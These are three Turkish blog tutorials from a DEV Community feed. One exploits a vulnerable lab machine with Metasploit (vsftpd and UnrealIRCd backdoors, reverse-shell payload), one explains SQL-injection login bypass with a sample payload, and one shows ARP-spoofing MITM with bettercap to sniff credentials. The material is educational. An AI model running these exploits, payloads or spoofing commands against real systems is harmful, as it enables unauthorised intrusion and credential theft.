DEV Community: Berkay-Şen

Zafiyetli Makine Çözümü

Berkay-Şen — Tue, 07 Dec 2021 21:03:35 +0000

Zaafiyetli makine çözümümüze başlamadan önce birkaç kavramı teorik olarak bilmemiz gerekiyor.Örnek olarak Exploit,payload gibi kavramlara hakim olalım ki sızma testi işleminin mantığını kavrayabilelim.

Exploit Nedir?

Exploit bilgisayar, yazılım, programlarda veyahutta
bir sistemde, sistem açıklarından ya da programcının kod
hatalarını kullanarak sisteme sızmaya veya sistemde istenmeyen hatalar oluşturmak için geliştirilmiş yazılımlar ve programlardır diyebiliriz.

Exploitler Neler Yapabilir

Exploitler yetkimizin bulunmadığı bir sisteme izinsiz giriş yapmabilme,verileri çalabilme,verileri görüntüleme,bu verileri değiştirebilme, sistem üzerinde yetkili kullanıcılar oluşturabilme ,sistemin işleyişini yavaşlatabilme,işleyişi aksatabilme veyahutta devre dışı bırakabilme gibi özellikleri gerçekleştirebilirler.

Zero-Day Exploit Nedir?

Zero-Day exploitler henüz daha açığı kapatılmamış,(yama yapılmamış)
exploitlerdir.Hackerlar geliştirdikleri exploitlerin yayılmasını istemezler. Çünkü yayılırsa bu açık kapanacaktır.

Exploit Veritabanları

https://www.rapid7.com
https://www.exploit-db.com
Bu ve bunun gibi sitelerin içerisinde bir çok exploit bulunmaktadır. Rapid7 Metasploit aracının içerisinde bulunan exploitlerin bulunduğu sitedir.Aynı exploitleri Metasploit aracında da bulabiliriz

Payload Nedir ?

Hedef sisteme exploit doğru bir şekilde uygulandıktan sonra hedefe yollanıp çalıştırılaması istenen yazılıma/modüle verilen addır. Bu modül sayesinde karşı tarafla bağlantımız sağlamış olup karşı tarafa göndereceğimiz gereken komutları bizden bekler/dinler ve modül sayesinde açmış olduğumuz servise gönderir ve bu komutların karşı tarafta çalışmasını sağlar.

Bind Payload Nedir?

Bind payload türünde hedefin açık portundan içeriye sızılıp,bizim hedefe bağlanmamızı sağlayan payloadlardır. Biz karşı sisteme bağlandığımız için olası antivirüsler ve firewall’lar yakalayabilir.

Reverse Payload Nedir?

Reverse payload türünde ise karşı hedef bizim cihazımıza bağlanarak sızma işlemi gerçekleştirilir. Karşı hedef bize bağlandığı için firewall ve antivürüslere yakalanma olasığı düşüktür.

Sızma İşlemine Giriş

İlk başta nmap aracı ile ağımızdaki cihazları tarayıp listeleyerek sızacağımız cihazın IP adresini bulalım.

nmap 10.0.2.0/24 –T5

-T5 parametresi ile taramanın hızlı olmasını sağlıyoruz.

Şimdi bu IP üzerinden hedef sistemdeki portlarda çalışan servislerin versiyonları hakkında bilgi alalım.

nmap –sV 10.0.2.4

-sV parametresi servislerin versiyonlarını getirir.

Metasploit Nedir ? ( msfconsole )

Metasploit Framework, hem ofansif hem de defansif güvenlikte kullanılan açık kaynaklı ve Ruby dili ile yazılmış bir platformdur. Metasploit Framework, sistemlerde bulunan açıkların tespit edilmesi, sömürülmesi ve sistemlere sızılması için gerekli araçları içinde barındıran bir yapıdır.

Metasploit Framework’ü Kali Linux içerisinde hazır olarak gelmektedir.Çalıştırmak için ise msfconsole Komutu kullanılmalıdır.

Metasploit üzerinde bir servisin exploitin bulunup bulunmadığını anlamak için search komutunu kullanırız.

search vsftpd

Komutunu kullanarak vsftpd servisinde bir exploitin bulunup bulunmadığını aradık ver karşımıza bir adet exploit çıktı.Bu exploiti kullanmak için bulduğumuz exploitin Name kısmını kullanarak exploiti seçiyoruz.

use exploit/unix/ftp/vsftpd_234_backdoor

Exploitimizi seçtik,şimdi de bu exploite uygun payloadları listelememiz gerekiyor bunun için şu komutu kullanıyoruz.

show payloads

Payloadlar listelendi.Aralarından birini seçmek için ise;

set payload payload/cmd/unix/interact

Exploitimizi de payloadımızı da seçtik. Şimdi bu exploitin hangi sisteme IP'ye sızacağını belirtmemiz gerek. Aksi takdirde exploit hangi sisteme sızma işlemi yapacağını normal olarak bilemeyecektir. Ayarları göstermek için ise;

show options

komutunu kullanırız.

Buradaki ayarların ne olduğunu açıklayacak olursak,
RHOST Hedef cihazın IP’si olmalı,
RPORT ise hedef cihazda hangi porttan sızma işlemi yapacaksak o portun numarası olmalı.
Bu ayarları değiştirmek için;

set RHOST 10.0.2.4

set RPORT 21

Sızma işlemini başlatmak için ise

run

ya da

exploit

Komutlarını kullanırız.

Görüldüğü gibi bir shell bağlantısının açıldığı yazıyor ekranda. Şuan karşı sisteme başarılı bir şekilde sızdığımızı söyleyebilirim. Şuan karşı sistemde bazı komutları kullanmayı deneyebilirsiniz. Örnek olarak ls , whoami vb.

Hedef sistemde hangi kullanıcı ile giriş yaptığımızı görmek için
whoami kullanalım.

Gördüğünüz gibi root kullanıcıyız.Ancak her zaman bu kadar şanslı olamayabiliriz. Yetkisi düşük bir kullanıcı ile giriş yapmış olabilirdir.O zaman da yetkimizi yükseltmek için farklı yöntemlere başvuracaktık.

Şimdi ise başka bir sızma testini reverse payload ile yapalım.

Bu sefer 6667. portta çalışan servisten sisteme sızacağız.

Msfconsole üzerinden bu servisi aratalım.

Search UnrealIRCd

Gördüğünüz gibi yine bu servis ile ilgili bir exploit bulundu. Hemen kullanımına geçelim.

Bulduğumuz exploiti seçelim.

use exploit/unix/irc/unreal_ircd_3281_backdoor

Exploiti use komutu ile seçtikten sonra payloadlara göz atalım.

show payloads

Payladımızı set komutu ile seçelim

set payload payload/cmd/unix/reverse

Her payload çalışmayabilir,çalışmayan payload olursa başka bir payload denemeliyiz.Eğer sisteme sızamazsak bu exploit çalışmadığı anlamına gelmez.Payload'ımızda sorun olabilir,farklı payloadlar denersek sorunu çözebiliriz.

Gerekli ayarlamaları yapalım.

show options

Bu sefer RHOST ve RPORT dışında da farklı ayarlar gördük. Bunlar LHOST ve LPORT .Peki bu LHOST ve LPORT nedir. Başta anlattığımız reverse payload'ın ayarlarıdır. Reverse payloadın çalışma mantığı sızacağımız sistem bize bağlanıyordu. Bu yüzden

LHOST bizim IP adresimiz
LPORT karşı bağlantının bizimle iletişime geçecek olan port numarası.

Ayarları yaptıktan sonra exploiti çalıştırabiliriz.

Ve gördüğünüz gibi tekrardan karşı sisteme sızmış bulunmaktayız...

SQL Injection Nedir?

Berkay-Şen — Tue, 30 Nov 2021 14:58:07 +0000

SQL injection nedir demeden önce SQL Nedir buna bakalım

SQL Nedir?
SQL Bir sorgulama dilidir. İlişkisel veritabanları ile etkileşime girmek için geliştirilmiştir.Veritabanındaki verilerde değiştirme,silme ekleme gibi bir çok etkileşimi SQL komutları ile yapabiliriz.MSSQL , MYSQL gibi veritabanı türleri SQL sorgu dilini kullanılır.

Örnek Bir SQL Sorgusu

SELECT * FROM Users where Username='Berkay' and Password='123456'

Bu SQL sorgusu veritabanındaki Users tablosundan kullanıcı adı “Berkay” ve şifresi “123456” olan kullanıcıların tüm bilgilerini getirir.

Biz bir sisteme login olurken de buna benzer komutlar arkaplanda çalışıyordur.Login olduğumuz formda ya da URL üzerinden bu arkaplanda çalışan sorguya müdahale edebiliriz.Tabii böyle bir açık programcı tarafından kapatılmadıysa/önlenmediyse.

Şimdi SQL injectionu anlatalım.

SQL injection saldırıları normal sql sorgularına müdahale edip kendi istediğimiz SQL kodlarını sisteme enjekte edip çalıştırmamızı sağlayan güvenlik açıklarıdır.

SQL injection güvenlik açığı sayesinde saldırganlar;

Web sitesindeki kullanıcı bilgileri çalınabilir
Veritabanındaki veriler değiştirilebilir
Veritabanı silinebilir ...

Normal bir senaryoda giriş yaptığımız sistemde kullanıcı adı ve parola yerimiz vardır. Buradaki inputlara girdiğimiz veriler aşağıda tırnaklar arasına verdiğimiz kısımlara gelmektedir

SELECT * FROM Users where Username='KULLANICIADI' and Password='PAROLA'

Görüldüğü üzere kullanıcı adı kısmına brktrl yazdım.Şifre kısmına da 123456789deneme yazdım.Arkaplanda bu nasıl bir sorgu yaratıyor hemen bakalım.

SELECT * FROM Users where Username='brktrl' and Password='123456789deneme'

Buraya kadar her şey normal.Ancak ben kullanıcı adı inputunun yerine şu kodu yazsam ve şifre input yerini de boş bıraksam ne olurdu sizce?

'--

Eğer şifre kısmına bunu yazsaydım ne olacaktı hemen bakalım.

SELECT * FROM Users where Username='brktrl'--' and Password='123456789deneme'

Çift tire kullandığımızda bu SQL’de yorum satırı anlamına gelir.Yani bizim yazdığımız tek tırnaktan sonra kalan kısım yorum satırıdır. Bu yüzden arka tarafta şu kod çalıştırılmış gibi olacaktır.

SELECT * FROM Users where Username='brktrl'

Kalan kısım yorum satırı olduğu için çalıştırılmayacaktır.Bu yüzden yazmadım. Gördüğünüz gibi arkaplanda çalışan komut sadece kullanıcı ismini yazarak bu hesaba giriş yapmamızı sağlıyor.İşte SQL Injection bu ve bunun gibi işlemlere denir.

Programcının alabileceği bazı önlemlere göre stratejimizi değiştirebiliriz.Yukarıda anlattıklarım işe yaramazsa daha farklı denemeler payloadlar kullanabilirsiniz.

Açık olduğunu düşündüğünüz sitenin linkini “sqlmap” aracına vererek de veritabanına sızabilirsiniz.

MITM Saldırısı Nedir?

Berkay-Şen — Tue, 30 Nov 2021 14:46:03 +0000

*ÖNEMLİ! BURADA ANLATILANLAR TAMAMEN EĞİTİM AMAÇLIDIR . ÖĞRENİLEN BİLGİLERİN BAŞKA KURUM,KURULUŞ VE ŞAHISLARA YAPILMASINDAN SALDIRIYI YAPAN SORUMLUDUR.
*

MITM (Man in the middle) yani “Ortadaki Adam Saldırısı” yerel ağ üzerinde yapılan,seçilen kurbanın internet trafiğini veyahutta başka cihazlarla olan iletişimini dinleme,düzenleme,durdurma,yönlendirme gibi bir çok imkana olanak sağlayan ve siber dünyada sıkça kullanılan bir saldırı çeşididir.Bu saldırıda yerel ağ üzerinde (Local Network) haberleşen iki cihazın trafiği manipüle edilebilir ve trafik akışı okunabilir/engellenebilir. Bu saldırı gelen giden paket alışverişini dinleyip analiz etme mantığında çalışır.

Saldırgan bir networkte internet akışını kendine yönlendirir ve cihazların istek ve cevapları saldırgan üzerinde geçer.Bu sayede saldırgan üzerinden geçen paketleri okuyabilme gibi birçok imkana/yetkiye sahip olur.Saldırgan üzerinden gelen-giden paketlerde analiz yaparak veyahutta bazı hazır araçları kullanarak önemli şifrelerimizi,tarayıcıda tutulan cookie bilgilerimiz gibi bir çok bilgiyi saldırgan eline geçirebilir.

Saldırıda temel amaç cihazları kandırmaya yöneliktir.Bu ise ARP protokolü ile yapılır.Saldırının detaylarına girmeden önce ARP Protokolü nedir ve ne işe yarar bundan bahsedelim.

ARP PROTOKOLÜ NEDİR NE İŞE YARAR?

Arp protokolü adres çözümleme protokolü olarak bilinir. Cihazlar birbirlerini MAC adresleri ile tanır.Bir networkde cihazların iletişim kurabilmesi için her bir cihazın Local IP adreslerinin olması gereklidir.Buda ya manuel olarak ya da DHCP ile IP adresleri cihazlara atanır.

Her IP adresinin karşısında bir MAC adresi vardır.Bir cihaz bir paketi başka bir cihaza göndermek isterse ilk başta ARP-Tablosuna bakar.Windows işletim sistemlerinde arp tablosuna bakmak için Komut istemcisine yani CMD’ye “arp -a” komutu girilir.Arp Tablosunun örneği:

Görüldüğü üzere her IP adresinin karşısında bir Fiziksel adres bulunmaktadır.Bu eşleştirmeyi sağlayan protokol ise ARP Protokolüdür.

Saldırı Stratejisi

Bir networkde bir cihaz kendini diğer cihazlara tanıtmak için gelen arp isteğine bir cevap gönderir. “Benim MAC Adresim bu ve IP adresim şu”şeklinde paketini gönderir. Manipüle işlemi de burada başlıyor.Eğer bir cihaz daha paket isteği gelmeden sürekli cevaplar ile bu cihazın arp tablosu zehirlenirse saldırgan araya girmiş olur.

Daha net bir şekilde açıklayacak olursak küçük bir network hayal edelim.

Görselde de görüleceği üzere modem ile hedef cihaz birbiri ile istek ve cevapları karşılayıp bir iletişim halindeler.Ancak ağımıza bir saldırganın dahil olduğunu öngörelim.

Saldırgan daha modem ona kim olduğunu sormadan modeme sürekli karşılıksız arp paketleri gönderir ve bu paketlerde düzenlemeler yaparak gönderir. Kendi IP adresini hedefin IP Adresi olarak gösterip MAC adresine de kendi MAC adresini koyarak gönderir.Bu sayede modemin ARP Tablosunda artık 192.168.1.6 hedef cihazın MAC adresi saldırganın MAC adresi ile değişmiş olacaktır. Bu sayede modem bu IP’ye bir paket göndermek istediğinde gerçek Hedef’e değil ,saldırganın cihazına göndermiş olacaktır.Ancak bu yeterli değildir.Saldırgan eş zamanlı olarak aynı saldırıyı hedef cihaza da yapacaktır.

Saldırgan hedef cihaza da gidip kendi IP adresinin 192.168.1.1 olduğunu yani modemin IP adresini ve MAC adresini ise kendi mac adresi olarak gösterdiği için ,hedef cihaz da saldırganı modem zanneder.

Özetleyecek olursak. Modem saldırganı Hedef cihaz olarak zanneder ve o IP’den gelen istekleri saldırgana gönderir,hedef cihaz ise saldırganı modem zanneder ve isteklerini (GET/POST) saldırgana gönderir. Bu sayede saldırgan iki cihazın internet akışının arasına girer ve gelen giden paketleri kendi üzerinden geçirir.

MITM Saldırısı Nasıl Yapılır

Bu saldırının yapılması için birden fazla araç bulunmakta olup,kendi aracınızı da programlama dilleri ile yapabilirsiniz. Ben “bettercap” aracı ile MITM saldırısının yapılışını anlatacağım.

bettercap -iface eth0

bettercap -iface eth0 komutunu terminalimizde çalıştırarak aracımızı açıyoruz. -iface parametresi kullandığımız ağ kartını tanımlıyor. eth0 kablolu bağlantı için, wlan0 kablosuz bağlantı içindir.

Bettercap ile ağ taramak / ağdaki cihazları bulmak

Bettercap’te ağımızdaki cihazları görmek için kolay bir komut vardır. net.probe on yazdığımızda ağımız taranmaya başlar ve ağımızdaki cihazların IP ve MAC adres bilgileri ekrana yazılmaya başlanır.

Ağ taramayı açmak için kullanacağımız komut

net.probe on

Ağ taramayı kapatmak için kullanacağımız komut

net.probe off

Görüldüğü üzere bir adet cihaz bulundu ağımızda.Birden fazla cihaz varsa daha güzel bir tablo şeklinde görmek isterseniz cihazları net.show komutunu kullanabilirsiniz.

net.show

Saldırı yapacağımız cihazın IP adresini belirlemek için şu komutu kullanıyoruz. set arp.spoof.targets örnek olarak

set arp.spoof.targets 192.168.43.250

Eğer bu saldırı gateway ile hedef arasına girmek ise şu komutu çalıştırmamız gerekiyor.Bu komut hem gateway’e hem de belirlediğimiz hedefe aynı saldırıyı otomatik olarak gerçekleştirir.

set arp.spoof.fullduplex true

Saldırıyı başlatmak ve gelen giden paketleri bettercap üzerinden dinlemek için şu komutları çalıştırmalıyız

arp.spoof on Bu saldırıyı başlatmak için çalıştırılan komuttur,durdurmak için arp.spoof off kullanmalıyız.

arp.spoof on

net.sniff on Bu komut ise gelen giden paketleri terminale ayrıştırarak bastırmamızı sağlar.

net.sniff on

net.sniff on komutunu çalıştırdığımız için gelen giden istekler terminalimize yazılmaya başlandı.

Network analizi için daha kapsamlı araç olan **Wireshark **programından da bu paketleri inceleyebiliriz.Wireshark’ı açtıktan sonra interface’imizi seçiyoruz ve arama kısmına http yazıp enter’a basıyoruz.Bunu yapmamız sadece http isteklerini görmemizi sağlayacaktır.Aksi takdirde bir sürü tarafımızdan diğer cihazlara arp paketleri gönderdiğimizden dolayı bir yığın içerisinden araştırma yapmamız gerekecektir.Bu da işleri oldukça zorlaştıracaktır.

Gelen paketlere çift tıklarsak daha detaylı bilgiler elde ederiz.

Açtığımız bir GET istekli bir pakette Hypertext Transfer Protocol sekmesinin altında isteklerimizi görebiliyoruz.Eğer bir form doldurmuş olsaydı kullanıcı,formundaki verileri de görebilmemiz mümkün olacaktı.Gelin hemen deneyelim.

Kendi sitem üzerinden saldırı esnası sırasında login ekranına giriş yapıyorum kurban cihazdan.

Aynı zamanda da wireshark üzerinden paketleri inceliyorum.

Wireshark üzerinde http POST methodu olan bir paket gördük, içeriğini açalım.

Burada da gördüğünüz gibi username ve password kısımları saldırganın ellerinde...